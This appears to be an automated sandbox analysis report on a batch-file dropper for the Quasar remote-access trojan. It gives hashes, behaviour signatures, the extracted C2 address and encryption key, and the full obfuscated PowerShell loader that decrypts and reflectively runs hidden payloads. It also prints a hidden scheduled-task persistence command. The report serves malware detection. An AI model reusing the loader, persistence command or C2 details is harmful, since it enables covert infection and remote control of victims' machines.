Analysis
-
max time kernel
92s -
max time network
94s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
16-05-2024 17:57
Static task
static1
Behavioral task
behavioral1
Sample
Uni.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Uni.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
Uni.bat
Resource
win11-20240508-en
Behavioral task
behavioral4
Sample
Uni.bat
Resource
android-33-x64-arm64-20240514-en
General
-
Target
Uni.bat
-
Size
513KB
-
MD5
0a925ca16ec44e9565027638c4ff20f7
-
SHA1
d20cce3d5306e093b5229277bf185d8837870434
-
SHA256
f97f77ce58a88581f1c85dd041e9eae54355627ecb8a50879e3e2b2d3b93c928
-
SHA512
063be2320c4fabda61ea010ed4cecd8cb48805590d174efe9df5664afe7507ab83087b604ecb9999c7c1c51e13a841735e976d846ef6c693fe0c72ac94ca1d43
-
SSDEEP
12288:ZUA4TL+TtSVgrl27G3czjtDAJyemKolW59Evy:ZUA4Yx27GYGJyemKtivy
Malware Config
Extracted
quasar
3.1.5
SLAVE
even-lemon.gl.at.ply.gg:33587
$Sxr-AidubAN29rBfWYM23w
-
encryption_key
iBg8YjYObpa3f3ADDras
-
install_name
$sxr-powershell.exe
-
log_directory
$SXR-LOGS
-
reconnect_delay
3000
-
startup_key
$sxr-powershell
-
subdirectory
$sxr-seroxen2
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2992-78-0x0000000006D80000-0x0000000006DEC000-memory.dmp family_quasar -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exeflow pid process 27 2992 powershell.exe 29 2992 powershell.exe 31 2992 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 2556 powershell.exe 3696 powershell.exe 2992 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 26 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 2556 powershell.exe 2556 powershell.exe 3696 powershell.exe 3696 powershell.exe 3696 powershell.exe 2992 powershell.exe 2992 powershell.exe 2992 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2556 powershell.exe Token: SeDebugPrivilege 3696 powershell.exe Token: SeIncreaseQuotaPrivilege 3696 powershell.exe Token: SeSecurityPrivilege 3696 powershell.exe Token: SeTakeOwnershipPrivilege 3696 powershell.exe Token: SeLoadDriverPrivilege 3696 powershell.exe Token: SeSystemProfilePrivilege 3696 powershell.exe Token: SeSystemtimePrivilege 3696 powershell.exe Token: SeProfSingleProcessPrivilege 3696 powershell.exe Token: SeIncBasePriorityPrivilege 3696 powershell.exe Token: SeCreatePagefilePrivilege 3696 powershell.exe Token: SeBackupPrivilege 3696 powershell.exe Token: SeRestorePrivilege 3696 powershell.exe Token: SeShutdownPrivilege 3696 powershell.exe Token: SeDebugPrivilege 3696 powershell.exe Token: SeSystemEnvironmentPrivilege 3696 powershell.exe Token: SeRemoteShutdownPrivilege 3696 powershell.exe Token: SeUndockPrivilege 3696 powershell.exe Token: SeManageVolumePrivilege 3696 powershell.exe Token: 33 3696 powershell.exe Token: 34 3696 powershell.exe Token: 35 3696 powershell.exe Token: 36 3696 powershell.exe Token: SeIncreaseQuotaPrivilege 3696 powershell.exe Token: SeSecurityPrivilege 3696 powershell.exe Token: SeTakeOwnershipPrivilege 3696 powershell.exe Token: SeLoadDriverPrivilege 3696 powershell.exe Token: SeSystemProfilePrivilege 3696 powershell.exe Token: SeSystemtimePrivilege 3696 powershell.exe Token: SeProfSingleProcessPrivilege 3696 powershell.exe Token: SeIncBasePriorityPrivilege 3696 powershell.exe Token: SeCreatePagefilePrivilege 3696 powershell.exe Token: SeBackupPrivilege 3696 powershell.exe Token: SeRestorePrivilege 3696 powershell.exe Token: SeShutdownPrivilege 3696 powershell.exe Token: SeDebugPrivilege 3696 powershell.exe Token: SeSystemEnvironmentPrivilege 3696 powershell.exe Token: SeRemoteShutdownPrivilege 3696 powershell.exe Token: SeUndockPrivilege 3696 powershell.exe Token: SeManageVolumePrivilege 3696 powershell.exe Token: 33 3696 powershell.exe Token: 34 3696 powershell.exe Token: 35 3696 powershell.exe Token: 36 3696 powershell.exe Token: SeIncreaseQuotaPrivilege 3696 powershell.exe Token: SeSecurityPrivilege 3696 powershell.exe Token: SeTakeOwnershipPrivilege 3696 powershell.exe Token: SeLoadDriverPrivilege 3696 powershell.exe Token: SeSystemProfilePrivilege 3696 powershell.exe Token: SeSystemtimePrivilege 3696 powershell.exe Token: SeProfSingleProcessPrivilege 3696 powershell.exe Token: SeIncBasePriorityPrivilege 3696 powershell.exe Token: SeCreatePagefilePrivilege 3696 powershell.exe Token: SeBackupPrivilege 3696 powershell.exe Token: SeRestorePrivilege 3696 powershell.exe Token: SeShutdownPrivilege 3696 powershell.exe Token: SeDebugPrivilege 3696 powershell.exe Token: SeSystemEnvironmentPrivilege 3696 powershell.exe Token: SeRemoteShutdownPrivilege 3696 powershell.exe Token: SeUndockPrivilege 3696 powershell.exe Token: SeManageVolumePrivilege 3696 powershell.exe Token: 33 3696 powershell.exe Token: 34 3696 powershell.exe Token: 35 3696 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 2992 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exedescription pid process target process PID 2028 wrote to memory of 2556 2028 cmd.exe powershell.exe PID 2028 wrote to memory of 2556 2028 cmd.exe powershell.exe PID 2028 wrote to memory of 2556 2028 cmd.exe powershell.exe PID 2556 wrote to memory of 3696 2556 powershell.exe powershell.exe PID 2556 wrote to memory of 3696 2556 powershell.exe powershell.exe PID 2556 wrote to memory of 3696 2556 powershell.exe powershell.exe PID 2556 wrote to memory of 1628 2556 powershell.exe WScript.exe PID 2556 wrote to memory of 1628 2556 powershell.exe WScript.exe PID 2556 wrote to memory of 1628 2556 powershell.exe WScript.exe PID 1628 wrote to memory of 2288 1628 WScript.exe cmd.exe PID 1628 wrote to memory of 2288 1628 WScript.exe cmd.exe PID 1628 wrote to memory of 2288 1628 WScript.exe cmd.exe PID 2288 wrote to memory of 2992 2288 cmd.exe powershell.exe PID 2288 wrote to memory of 2992 2288 cmd.exe powershell.exe PID 2288 wrote to memory of 2992 2288 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sUCdiMpPcTo1kNTcd5faO+vGx5veajqktS5lxbmGgB0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HohuDnSLNHAZu1hC5GGBHg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $lxCOt=New-Object System.IO.MemoryStream(,$param_var); $ejzUa=New-Object System.IO.MemoryStream; $KBGGf=New-Object System.IO.Compression.GZipStream($lxCOt, [IO.Compression.CompressionMode]::Decompress); $KBGGf.CopyTo($ejzUa); $KBGGf.Dispose(); $lxCOt.Dispose(); $ejzUa.Dispose(); $ejzUa.ToArray();}function execute_function($param_var,$param2_var){ $KWZel=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $yxLPQ=$KWZel.EntryPoint; $yxLPQ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$Urrlw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($eNEwK in $Urrlw) { if ($eNEwK.StartsWith(':: ')) { $UjlEC=$eNEwK.Substring(3); break; }}$payloads_var=[string[]]$UjlEC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_118_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_118.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3696 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_118.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_118.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sUCdiMpPcTo1kNTcd5faO+vGx5veajqktS5lxbmGgB0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HohuDnSLNHAZu1hC5GGBHg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $lxCOt=New-Object System.IO.MemoryStream(,$param_var); $ejzUa=New-Object System.IO.MemoryStream; $KBGGf=New-Object System.IO.Compression.GZipStream($lxCOt, [IO.Compression.CompressionMode]::Decompress); $KBGGf.CopyTo($ejzUa); $KBGGf.Dispose(); $lxCOt.Dispose(); $ejzUa.Dispose(); $ejzUa.ToArray();}function execute_function($param_var,$param2_var){ $KWZel=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $yxLPQ=$KWZel.EntryPoint; $yxLPQ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_118.bat';$Urrlw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_118.bat').Split([Environment]::NewLine);foreach ($eNEwK in $Urrlw) { if ($eNEwK.StartsWith(':: ')) { $UjlEC=$eNEwK.Substring(3); break; }}$payloads_var=[string[]]$UjlEC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2992
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4196,i,16488180140590516186,11762960689811837350,262144 --variations-seed-version --mojo-platform-channel-handle=4156 /prefetch:81⤵PID:3788
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD59751fcb3d8dc82d33d50eebe53abe314
SHA17a680212700a5d9f3ca67c81e0e243834387c20c
SHA256ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7
SHA51254907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709
-
Filesize
17KB
MD58a5b17921e36c7de6497b037632aabe1
SHA12f633a5ec3a29584292c6266f4f8ab6e9ef8ccfa
SHA256631c3c58a699f0ae56b5fe3fc0d7f4be2d085740afbe63a7a6ffeedebbbfc1c5
SHA512025aca647bc3244d09e8e0e8bc3d490298296fd1137144dff973d5e84e595b82333a0b22c398a06cbc3e7e7daf9ce340c9524c0e31cbd041df410179ce250656
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
513KB
MD50a925ca16ec44e9565027638c4ff20f7
SHA1d20cce3d5306e093b5229277bf185d8837870434
SHA256f97f77ce58a88581f1c85dd041e9eae54355627ecb8a50879e3e2b2d3b93c928
SHA512063be2320c4fabda61ea010ed4cecd8cb48805590d174efe9df5664afe7507ab83087b604ecb9999c7c1c51e13a841735e976d846ef6c693fe0c72ac94ca1d43
-
Filesize
115B
MD52ea31a6d1f87eae4e1e823f9ff59c278
SHA1352636ad6cf76ed7545be9264c357f998d46c607
SHA25617fe9fe54a7fd5ad22f8e22da999cc4278605a716e62d5301bb6c9b3ff72af8d
SHA512cadab762f83f45ef6a009c52cb56fde45f14d51e8bc24dc4b799a30d9db2e0edb597157861247bcdb3b409c646ddd53c3bfb11a58410f6c8f3ca9af6baa355a1